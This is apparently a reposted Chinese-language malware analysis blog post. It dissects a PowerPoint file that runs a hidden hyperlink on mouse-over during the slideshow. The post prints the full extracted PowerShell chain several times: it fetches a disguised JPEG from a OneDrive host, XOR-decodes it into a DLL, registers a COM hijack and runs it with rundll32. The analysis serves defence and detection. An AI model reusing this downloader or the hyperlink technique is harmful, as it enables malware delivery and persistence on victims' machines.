正文

隐藏在PPT中的后现代主义印象派作品

admin
admin V管理员 /0 评论 /178 阅读
0531
此篇文章发布距今已超过542天,您需要注意文章的内容或图片是否可用!

点击上方蓝字关注我们

声明

    文中涉及内容仅作技术交流使用,切勿用于违法行为!

前言

    样本哈希来源于一篇国际报告文章,部分内容已在文章中详细说明,本文主要对其中略过的一些细节进行分析


文章地址:

https://blog.cluster25.duskrise.com/2022/09/23/in-the-footsteps-of-the-fancy-bear-powerpoint-graphite/

Part 1

寻找恶意代码

    该样本乍一看是个纯纯的ppt,打开后会显示一段看似无害的说明文档,此时进行任何操作均不会触发恶意代码。

    在播放幻灯片后,随着鼠标的移动,就开始发现不对劲了。发现鼠标在不断地转圈圈,说明后台有东西在运行。此时我意识到,应该是触发了一些奇怪的开关。开始检查ppt的内容,没有发现宏,没有发现文档中的任何文字嵌入超链接为了确认恶意行为的确发生了,用监控软件黑盒跑了一下。

跟进这个动作的参数:

数据太长,完整内容如下:

cmdline:'"C:WindowsSystem32WScript.exe"
".vbs:................windowsSystem32::$index_allocationSyncAppvPublis
hingServer.vbs" ;$t=$env:Temp+'local.lnk';if([IO.File]::Exists($t)){break;};
[IO.File]::Create($t,1,
[io.FileOPtions]::DeleteOnClose);$r=$ENV:ALLUSERSPROFILE+'lmapi2.dll';if([IO.Fi
le]::Exists($r)){break;};$s=
[Convert]::ToChar(0x2F);$u='https:\9b5uja.am.files.1drv.com'+$s+'y4mpYJ245I931D
UGr7BV-dwLD7SReTqFr1N7eQOKSH_u-g2G18Jd6i3SRqYqgugj3FA2JQQ7JqclvWH13Br3B5Ux-
F6QcqADr-FowC_9PZi1Aj7uckcK8Uix_7j'
他丫的真的在干坏事,被我逮住了嘻嘻。不过内容貌似不完整,最后声明的变量$u显然没有被用到。接下来就需要定位恶意行为的具体触发位置,在检查文档内容的过程中,发现伴随着鼠标的移动现光标会时不时地会变成下图的样式,意思是光标正指在某个可以选中的可移动目标上。

既然如此,那就移动一下看看

换一下背景色,可以看到是下面的图形:

好家伙,多少沾点抽象。原来做安全不仅要会coding,还得有一定的艺术造诣,越来越卷了.jpg,接下来,在上述灰色的地方右键果然发现了嵌入的文件形式超链接,后面跟上的长长一串参数,具体指向的就是上文中的那段代码:

到此,通过行为监控和样本分析同时把线索指向了上面这段代码,接下来对这段代码进行分析。

Part 2

恶意代码分析

cmdline:'"C:WindowsSystem32WScript.exe"
".vbs:................windowsSystem32::$index_allocationSyncAppvPublis
hingServer.vbs" ;$t=$env:Temp+'local.lnk';if([IO.File]::Exists($t)){break;};
[IO.File]::Create($t,1,
[io.FileOPtions]::DeleteOnClose);$r=$ENV:ALLUSERSPROFILE+'lmapi2.dll';if([IO.Fi
le]::Exists($r)){break;};$s=
[Convert]::ToChar(0x2F);$u='https:\9b5uja.am.files.1drv.com'+$s+'y4mpYJ245I931D
UGr7BV-dwLD7SReTqFr1N7eQOKSH_u-g2G18Jd6i3SRqYqgugj3FA2JQQ7JqclvWH13Br3B5Ux-
F6QcqADr-FowC_9PZi1Aj7uckcK8Uix_7j'

    在对比监控软件dump下来的命令和ppt超链接中显示的命令尾部能够发现,监控软件中的代码并没有显示全,因此需要人工从ppt的超链接中把恶意代码再dump下来分析。

    问题就在于:下图的超链接窗口中无法进行复制,并且右键复制也无法成功。(后来发现,可能是由于分析环境中的office2013版本过低,更换到office2016后便可以成功右键复制超链接)

于是我只有用调试器附加到PowerPoint.exe上,最终在内存中找到了完整的代码:

cmdline:'"C:WindowsSystem32WScript.exe"
".vbs:................windowsSystem32::$index_allocationSyncAppvPublis
hingServer.vbs" ;$t=$env:Temp+'local.lnk';if([IO.File]::Exists($t)){break;};
[IO.File]::Create($t,1,
[io.FileOPtions]::DeleteOnClose);$r=$ENV:ALLUSERSPROFILE+'lmapi2.dll';if([IO.Fi
le]::Exists($r)){break;};$s=
[Convert]::ToChar(0x2F);$u='https:\9b5uja.am.files.1drv.com'+$s+'y4mpYJ245I931D
UGr7BV-dwLD7SReTqFr1N7eQOKSH_u-g2G18Jd6i3SRqYqgugj3FA2JQQ7JqclvWH13Br3B5Ux-
F6QcqADr-FowC_9PZi1Aj7uckcK8Uix_7ja1tF6C_8-
5xYgm6zwjbXsrlEcTEenAyA8BzEaGPudutl1wMDkzVr6Wm-
n8_qRmYejLgbNoQmPTUe3P5NKFFLRjeeU_JhvA'+$s+'DSC0002.jpeg?download';$f=(New-
Object Net.WebClient).DownloadData($u);if($f.Count -lt 10000)
{break;};$f=$f[4..$f.Count];$x=24;$f=$f|%{$x=(29*$x+49)% 256;$_=($_ -bxor
$x);$_};[IO.File]::WriteAllBytes($r,$f);$k=[Convert]::ToChar(0x23);$z=$s+'c reg
ADD HKCUSoftwareClassesCLSID{2735412E-7F64-5B0F-8F00-
5D77AFBE261E}InProcServer32 '+$s+'t REG_SZ '+$s+'d '+$r+' '+$s+'ve '+$s+'f '+
$s+'reg:64'+' && '+'rundll32.exe '+$r+','+$k+'1';cmd $z;'

可以看到使用了微软官方的SyncAppvPublishingServer.vbs来运行powershell脚本,格式化后的powershell脚本内容如下:

$t = $env: Temp + 'local.lnk';
if ([IO.File] : :Exists($t)) {
break;
};
[IO.File] : :Create($t, 1, [io.FileOPtions] : :DeleteOnClose);
$r = $ENV: ALLUSERSPROFILE + 'lmapi2.dll';
if ([IO.File] : :Exists($r)) {
break;
};
$s = [Convert] : :ToChar(0x2F);
$u = 'https:\9b5uja.am.files.1drv.com' + $s + 'y4mpYJ245I931DUGr7BV-
dwLD7SReTqFr1N7eQOKSH_u-g2G18Jd6i3SRqYqgugj3FA2JQQ7JqclvWH13Br3B5Ux-F6QcqADr-
FowC_9PZi1Aj7uckcK8Uix_7ja1tF6C_8-5xYgm6zwjbXsrlEcTEenAyA8BzEaGPudutl1wMDkzVr6Wm-
n8_qRmYejLgbNoQmPTUe3P5NKFFLRjeeU_JhvA' + $s + 'DSC0002.jpeg?download';
$f = (New - Object Net.WebClient).DownloadData($u);
if ($f.Count - lt 10000) {
break;
};
$f = $f[4..$f.Count];
$x = 24;
$f = $f | %{
$x = (29 * $x + 49) % 256;
$_ = ($_ - bxor $x);
$_
}; [IO.File] : :WriteAllBytes($r, $f);
$k = [Convert] : :ToChar(0x23);
$z = $s + 'c reg ADD HKCUSoftwareClassesCLSID{2735412E-7F64-5B0F-8F00-
5D77AFBE261E}InProcServer32 ' + $s + 't REG_SZ ' + $s + 'd ' + $r + ' ' + $s +
've ' + $s + 'f ' + $s + 'reg:64' + ' &
&
' + 'rundll32.exe ' + $r + ',' + $k + '1';
cmd $z;

这里的代码就很明朗了,下载DSC0002.jpeg并解密出一个dll,随后调用rundll32.exe执行该dll后续的dll就是一些常规的恶意代码了,且细节在参考文章中已经提过,不再赘述了。

小结


    因为具体的隐藏方式在参考文章中没有提及,所以写这篇文章记录了一下寻找恶意点的分析过程。这种利用方法使用的是超链接,与常见的宏利用不同的是,超链接不是存放在ole流中的,一些仅针对ole流查杀的手段无法发现这种恶意代码。并且超链接功能更强大,因为它的利用是基于SyncAppvPublishingServer来调用powershellpowershell能做什么,它就能做什么。不过遗憾的是,无论是宏还是超链接,它们都是静态地存放在文件中的,直接在010editor或者winhex中搜索都能直接搜到。

因此,不管它有多么花里胡哨,只要还是以硬编码的形式存放在文件中,最终还是逃不过最简单粗暴的静态查杀。

END

扫码关注最新动态

零域安全


隐藏在PPT中的后现代主义印象派作品


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
宙飒天下网-ZhouSa.com